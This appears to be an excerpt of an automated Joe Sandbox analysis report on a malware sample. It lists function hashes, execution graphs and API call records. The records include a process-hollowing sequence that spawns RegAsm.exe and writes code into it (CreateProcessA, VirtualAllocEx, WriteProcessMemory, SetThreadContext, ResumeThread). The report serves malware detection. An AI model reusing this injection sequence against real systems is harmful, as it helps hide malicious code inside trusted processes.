                                                                                                                                                                                                                                  Function 00D91310 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2159330177.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_d90000_aFBKY19rLrQU72E14du4WCPo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 469f7af03b7f12110986dcbdd4ee99e7726c8175c9958e78568129c9859ec2ae
                                                                                                                                                                                                                                  • Instruction ID: 0530e8e6b3ed2241ea4f97f76c52c020cbf86ad6b27097d7687dcdc4d80d80d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 469f7af03b7f12110986dcbdd4ee99e7726c8175c9958e78568129c9859ec2ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16716E789012288FEB64DF64DD54B9DBBB2FB49300F1081EAE50EA32A0DB755E85CF51
                                                                                                                                                                                                                                  Function 00D97718 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2159330177.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_d90000_aFBKY19rLrQU72E14du4WCPo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f62e8a3ca1d9c6f164b7c14a5384e29492369918b0b5404e777581f5ff535801
                                                                                                                                                                                                                                  • Instruction ID: 34bdc7a165bf27d51c010a4f2b662139ebb3d4abf429f08f3e006b6ce836fd0a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f62e8a3ca1d9c6f164b7c14a5384e29492369918b0b5404e777581f5ff535801
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C941E174D18219CFDF04DFE9D848AEEBBB5BF48300F24842AE416A7264E7B49945CF61
                                                                                                                                                                                                                                  Function 00D90980 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2159330177.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_d90000_aFBKY19rLrQU72E14du4WCPo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 61db9bc7855bf37de91b15ea9ee84bb99121c4ff16624c84e7aa810ffdeae53d
                                                                                                                                                                                                                                  • Instruction ID: 07df31b5cbd7dda97bdd22664bcb2bd273fe97bd40bacd8577b164d626ee8699
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61db9bc7855bf37de91b15ea9ee84bb99121c4ff16624c84e7aa810ffdeae53d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4319170A08359AFDF44DBB9A850AAEBFF1EF46304F1445AAD408D7252DB749900CF61
                                                                                                                                                                                                                                  Function 00D90818 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2159330177.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_d90000_aFBKY19rLrQU72E14du4WCPo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: de944e76387f8c813614b5196d175ceb952888908fa49bafc77f61ed54937e96
                                                                                                                                                                                                                                  • Instruction ID: a193e3b3175b544948755b6cc87e33104849a7fe48ef5bdb6cbdfd08ac9e2158
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de944e76387f8c813614b5196d175ceb952888908fa49bafc77f61ed54937e96
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1F06DA381F3C28FDB0387B4A8196997FA49B27351B1A0ADAD085C7163E3908905D762
                                                                                                                                                                                                                                  Function 00D97600 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2159330177.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_d90000_aFBKY19rLrQU72E14du4WCPo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 811dfe814db11aed533cbfe01e9c18950e3d55057ac3f45dee96bae93802792f
                                                                                                                                                                                                                                  • Instruction ID: 2a50f4a916132901b2e49bb84c8d764af6efd893d040540905150ca1f9b4644c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 811dfe814db11aed533cbfe01e9c18950e3d55057ac3f45dee96bae93802792f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C11E674E04609DFDF44DFAAD8486AEBBF6FF88301F108469D415A3264DB745941CFA1
                                                                                                                                                                                                                                  Function 00D90908 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2159330177.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_d90000_aFBKY19rLrQU72E14du4WCPo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f70298ac6351aadb7113b0559e23a3cf307f5d904d5badc1ac91efc752e97f92
                                                                                                                                                                                                                                  • Instruction ID: 9c1545020bceb864b56e105fb88450abcc53b525141b4c24678002ccb27d1f71
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f70298ac6351aadb7113b0559e23a3cf307f5d904d5badc1ac91efc752e97f92
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63018B7080E384AFEF21DBB8A91479EBFF09F07305F0840EAD84993162D7345945CB21
                                                                                                                                                                                                                                  Function 00D90918 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2159330177.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_d90000_aFBKY19rLrQU72E14du4WCPo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c8887aa00626ea464c1bc5d70a2cefe5beb85d5704fe3d381eb745e1d8a8c963
                                                                                                                                                                                                                                  • Instruction ID: d3075fc2257eeea4f415a6245618d76605762183cf4f6d764c505baa5763320e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8887aa00626ea464c1bc5d70a2cefe5beb85d5704fe3d381eb745e1d8a8c963
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AF06570909349AEEF64DBF8BC047ADBEF49707304F0804A9E849D3152EB709985CB65
                                                                                                                                                                                                                                  Function 00D90848 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2159330177.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_d90000_aFBKY19rLrQU72E14du4WCPo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 69793d3b5b09b5920d7587c00839f05f824d9d9d8daeeb257a52b820e84303b2
                                                                                                                                                                                                                                  • Instruction ID: c6f301b90427c4e25a2aa41e1ccf8349e1dda8684ee3af03aff2fe00bc8f3582
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69793d3b5b09b5920d7587c00839f05f824d9d9d8daeeb257a52b820e84303b2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAE04F70A05704DFEB54EBF9A904B9ABAE99F05301F0484A99408D3121E770CD00A6A5
                                                                                                                                                                                                                                  Function 00D960C6 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2159330177.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_d90000_aFBKY19rLrQU72E14du4WCPo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c60cc595fae9ff059a673b8f9d84c85fe3189f237c0dd2ea166ec6e7da8dd98d
                                                                                                                                                                                                                                  • Instruction ID: b48c7c1a216b1d4651655d0bda47778dee08d92f3fd158fc0231f0ccda94046a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c60cc595fae9ff059a673b8f9d84c85fe3189f237c0dd2ea166ec6e7da8dd98d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3BE0F674D103288FCBA6CF14C881A99BBB8AB58700F1090EAA40DA3240EA705F859F10
                                                                                                                                                                                                                                  Function 00D90CA7 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2159330177.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_d90000_aFBKY19rLrQU72E14du4WCPo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d78f54c1c724d0444dd88d69da65bc924fa00df66450f966df013c00c5b15f3e
                                                                                                                                                                                                                                  • Instruction ID: 7bd88d7c69ff5ecb7232b21005d105eb99a4da08d4038da4d2a8545a7427fba3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d78f54c1c724d0444dd88d69da65bc924fa00df66450f966df013c00c5b15f3e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CC01234809206C7DF008B44D4505A935B6A716311F141405C18963190E37684804A75
                                                                                                                                                                                                                                  Function 00D92BB2 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2159330177.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_d90000_aFBKY19rLrQU72E14du4WCPo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d18e4a25309a0b099bbcf6ca9cb9a901fe5e0dab5de35391642ad809c311f359
                                                                                                                                                                                                                                  • Instruction ID: 9b5e7cf6417e362fcf91bad771c5d4c17699e87b7cf9c64adef57bad75683400
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d18e4a25309a0b099bbcf6ca9cb9a901fe5e0dab5de35391642ad809c311f359
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DBD06CB89083299FCF20CF24CC48A99B7B0AB49300F5001D6A50AB2225E6309E80CF24

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:30.9%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:28
                                                                                                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                                                                                                  execution_graph 471 2f521a5 474 2f521dd CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 471->474 473 2f523ba WriteProcessMemory 475 2f523ff 473->475 474->473 476 2f52404 WriteProcessMemory 475->476 477 2f52441 WriteProcessMemory Wow64SetThreadContext ResumeThread 475->477 476->475 478 10e0b78 479 10e0b86 478->479 482 10e0bd0 479->482 480 10e0ba3 486 10e0c14 482->486 483 10e0f3c 483->480 484 10e0fab VirtualProtect 485 10e0fe8 484->485 485->480 486->483 486->484 487 10e0988 488 10e099d 487->488 490 10e0a73 488->490 491 10e0500 488->491 492 10e0f60 VirtualProtect 491->492 494 10e0fe8 492->494 494->490 495 10e0b57 496 10e0b86 495->496 498 10e0bd0 VirtualProtect 496->498 497 10e0ba3 498->497 499 10e0985 500 10e0988 499->500 501 10e0500 VirtualProtect 500->501 502 10e0a73 500->502 501->502

                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                                                  callgraph 0 Function_010E050C 1 Function_010E010C 2 Function_010E030C 3 Function_010E0208 4 Function_02F525FD 5 Function_010E0500 6 Function_010E0100 7 Function_010E0300 8 Function_010E011C 9 Function_010E051D 10 Function_02F526E1 11 Function_0108D01C 12 Function_02F525E0 13 Function_010E0318 14 Function_010E0519 15 Function_010E0214 16 Function_010E1010 17 Function_010E012C 18 Function_010E0224 19 Function_010E0324 20 Function_010E0525 21 Function_010E0521 22 Function_010E033C 23 Function_010E013C 24 Function_0108D030 25 Function_010E0434 26 Function_010E0234 27 Function_02F525C8 28 Function_010E0330 29 Function_010E0348 30 Function_010E0848 31 Function_010E0148 32 Function_010E0444 33 Function_010E0244 34 Function_0108D044 35 Function_02F525B8 36 Function_010E0B40 37 Function_010E0540 38 Function_02F521A5 39 Function_0108D058 40 Function_0108D059 41 Function_010E045C 42 Function_010E0B57 103 Function_010E0BD0 42->103 43 Function_010E0354 44 Function_010E0254 45 Function_010E0154 46 Function_010E0052 47 Function_010E0450 48 Function_010E026C 49 Function_010E036C 50 Function_010E0468 51 Function_010E0165 52 Function_0108D163 53 Function_010E0563 54 Function_010E0060 55 Function_010E0260 56 Function_010E0360 57 Function_010E047D 58 Function_010E0378 59 Function_010E0278 60 Function_010E0178 61 Function_010E0B78 61->103 62 Function_010E0479 63 Function_010E0475 64 Function_02F52589 65 Function_010E0070 66 Function_010E048D 67 Function_0108D18C 68 Function_010E0988 68->0 68->5 113 Function_010E04F4 68->113 69 Function_010E0188 70 Function_010E0489 71 Function_010E0284 72 Function_010E0384 73 Function_010E0485 74 Function_010E0985 74->0 74->5 74->113 75 Function_010E0080 76 Function_010E0481 77 Function_0108D187 78 Function_010E039C 79 Function_010E049D 80 Function_010E029D 81 Function_010E0198 82 Function_010E0499 83 Function_010E0495 84 Function_010E0090 85 Function_010E0390 86 Function_010E0491 87 Function_010E01A8 88 Function_010E00A0 89 Function_010E00BC 90 Function_010E04B8 91 Function_010E02B4 92 Function_010E01B4 93 Function_010E00B0 94 Function_02F52630 95 Function_010E00C8 96 Function_02F5253C 97 Function_010E02C4 98 Function_010E01C0 99 Function_010E02DC 100 Function_010E08D8 101 Function_010E00D4 102 Function_010E01D5 104 Function_010E02D0 105 Function_010E01EA 106 Function_010E08E8 107 Function_010E02E8 108 Function_0108D0E0 109 Function_0108D0E1 110 Function_010E00E4 111 Function_02F52605 112 Function_010E01F8 114 Function_010E02F4 115 Function_02F52809 116 Function_010E00F0

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 02F521A5 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F52117,02F52107), ref: 02F52314
                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02F52327
                                                                                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(000003A8,00000000), ref: 02F52345
                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(000003AC,?,02F5215B,00000004,00000000), ref: 02F52369
                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(000003AC,?,?,00003000,00000040), ref: 02F52394
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(000003AC,00000000,?,?,00000000,?), ref: 02F523EC
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(000003AC,00400000,?,?,00000000,?,00000028), ref: 02F52437
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(000003AC,?,?,00000004,00000000), ref: 02F52475
                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(000003A8,02E80000), ref: 02F524B1
                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(000003A8), ref: 02F524C0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2023359153.0000000002F52000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F52000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_2f52000_g2v2mVtOHdxh9ZgrtYde5yf0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                  • API String ID: 2687962208-1257834847
                                                                                                                                                                                                                                  • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                  • Instruction ID: 2b934ce8771f6e40480744cac234cbd3a3467de4026981a5d2466a753e904977
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBB1E57664068AAFDB60CF68CC80BDA77A5FF88754F158124EA0CAB341D774FA41CB94
                                                                                                                                                                                                                                  Function 010E0BD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 293memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 23 10e0bd0-10e0c37 26 10e0c3d-10e0c40 23->26 27 10e0cd8-10e0ce6 23->27 30 10e0c48-10e0c56 26->30 28 10e0cec-10e0cf4 27->28 29 10e0da2-10e0db8 27->29 33 10e0cfa-10e0d0d 28->33 34 10e0f46-10e0fe6 VirtualProtect 28->34 31 10e0dbe-10e0ddc 29->31 32 10e0f3c-10e0f43 29->32 30->34 44 10e0c5c-10e0ca7 30->44 35 10e0dde-10e0de4 31->35 36 10e0de5-10e0df0 31->36 33->34 37 10e0d13-10e0d1f 33->37 49 10e0fed-10e1001 34->49 50 10e0fe8 34->50 35->36 36->34 39 10e0df6-10e0e02 36->39 41 10e0d28-10e0d59 37->41 42 10e0d21-10e0d27 37->42 45 10e0e0b-10e0e12 39->45 46 10e0e04-10e0e0a 39->46 41->34 43 10e0d5f-10e0d69 41->43 42->41 43->34 48 10e0d6f-10e0d79 43->48 44->34 51 10e0cad-10e0cbe 44->51 45->34 52 10e0e18-10e0e22 45->52 46->45 48->34 53 10e0d7f-10e0d85 48->53 50->49 51->34 54 10e0cc4-10e0cd2 51->54 52->34 55 10e0e28-10e0e32 52->55 53->34 56 10e0d8b-10e0d9c 53->56 54->26 54->27 55->34 57 10e0e38-10e0e3e 55->57 56->28 56->29 57->34 58 10e0e44-10e0e50 57->58 58->34 59 10e0e56-10e0e67 58->59 60 10e0e69-10e0e6f 59->60 61 10e0e70-10e0eef 59->61 60->61 69 10e0f05-10e0f1c 61->69 70 10e0ef1-10e0efa 61->70 72 10e0f27-10e0f36 69->72 70->69 71 10e0efc-10e0f03 70->71 71->72 72->31 72->32
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(03F53590,?,00000001,0000012C,?,?,?,00000000,00000000,?,010E0A73,00000001,00000040), ref: 010E0FD9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.1989251829.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_10e0000_g2v2mVtOHdxh9ZgrtYde5yf0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                  • String ID: &S!$<1i;
                                                                                                                                                                                                                                  • API String ID: 544645111-1770337207
                                                                                                                                                                                                                                  • Opcode ID: 1fdf8033bfb97cb2b119e485091ad63c0f2987154448d2ca2ed06f7f7c244d59
                                                                                                                                                                                                                                  • Instruction ID: 695bc1ff9c499cb426691b4dff2aef88abd48642a6646bd14fabc562f8686d3a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fdf8033bfb97cb2b119e485091ad63c0f2987154448d2ca2ed06f7f7c244d59
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0C1B170A0425A8FCB15CFA9C5846EDFBF2BF48310F248599E499AB34AC375AD41CF94
                                                                                                                                                                                                                                  Function 010E0500 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 74 10e0500-10e0fe6 VirtualProtect 77 10e0fed-10e1001 74->77 78 10e0fe8 74->78 78->77
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(03F53590,?,00000001,0000012C,?,?,?,00000000,00000000,?,010E0A73,00000001,00000040), ref: 010E0FD9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.1989251829.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_10e0000_g2v2mVtOHdxh9ZgrtYde5yf0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                                                  • Opcode ID: 20ec24ede175bd460221cc9ee4892469961223ab7e334142b130f4f0e04fe357
                                                                                                                                                                                                                                  • Instruction ID: 3bb5285480d340dee08e18ba8236f31bc619fbc3e01810a04ad8f79a673670d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20ec24ede175bd460221cc9ee4892469961223ab7e334142b130f4f0e04fe357
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E621EEB590121DAFCB00DF9AD884BDEFBF4FB08310F10812AE958A7644C3B4A954CBA5
                                                                                                                                                                                                                                  Function 0108D059 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 156 108d059-108d079 157 108d0c9-108d0d1 156->157 158 108d07b-108d086 156->158 157->158 159 108d088-108d096 158->159 160 108d0be-108d0c5 158->160 162 108d09c 159->162 160->159 165 108d0c7 160->165 164 108d09f-108d0a7 162->164 166 108d0a9-108d0b1 164->166 167 108d0b7-108d0bc 164->167 165->164 167->166
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.1959017069.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_108d000_g2v2mVtOHdxh9ZgrtYde5yf0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9168659aa842ca3a94ca49d19976b4bff7b5a830d91d2bcde7dda7631b3f9cb3
                                                                                                                                                                                                                                  • Instruction ID: f916ad2438ae231670c0fe70b1a3e7ae5b8e49974ae440eece32ea517c3df3c3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9168659aa842ca3a94ca49d19976b4bff7b5a830d91d2bcde7dda7631b3f9cb3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7701A77110C3409BE7106AA5DD8476BBFD8DF41260F18865AFDC94A2C7C6799446CF72
                                                                                                                                                                                                                                  Function 0108D058 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 201 108d058-108d079 203 108d0c9-108d0d1 201->203 204 108d07b-108d086 201->204 203->204 205 108d088-108d096 204->205 206 108d0be-108d0c5 204->206 208 108d09c 205->208 206->205 211 108d0c7 206->211 210 108d09f-108d0a7 208->210 212 108d0a9-108d0b1 210->212 213 108d0b7-108d0bc 210->213 211->210 213->212
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.1959017069.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_108d000_g2v2mVtOHdxh9ZgrtYde5yf0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 63f4ea153c04d90fe212283c5df5bddb5246f552f28dfa23129f58f12753b9ef
                                                                                                                                                                                                                                  • Instruction ID: 51b5cd03bab94bfd53dfd07f860ebdd9e524b3b1ecfb2bf7b00950dd70ae4161
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63f4ea153c04d90fe212283c5df5bddb5246f552f28dfa23129f58f12753b9ef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FF0C271008340AEE7108E4ADD84B62FFE8EF40274F18C69AFD880B2C7C2799845CBB1

